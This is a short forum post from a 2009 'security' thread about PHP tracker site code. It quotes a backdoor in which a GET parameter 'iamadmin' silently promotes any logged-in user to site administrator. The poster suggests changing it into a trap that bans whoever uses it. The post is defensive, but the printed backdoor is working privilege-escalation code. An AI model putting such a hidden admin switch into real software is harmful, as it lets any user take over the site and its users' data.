Thread: security
View Single Post
  #14  
Old 28th July 2009, 19:02
sammygo sammygo is offline
Senior Member
  
Join Date: May 2008
P2P
Posts: 141
Default
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Your class now is 0 :(");
                }

change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
Reply With Quote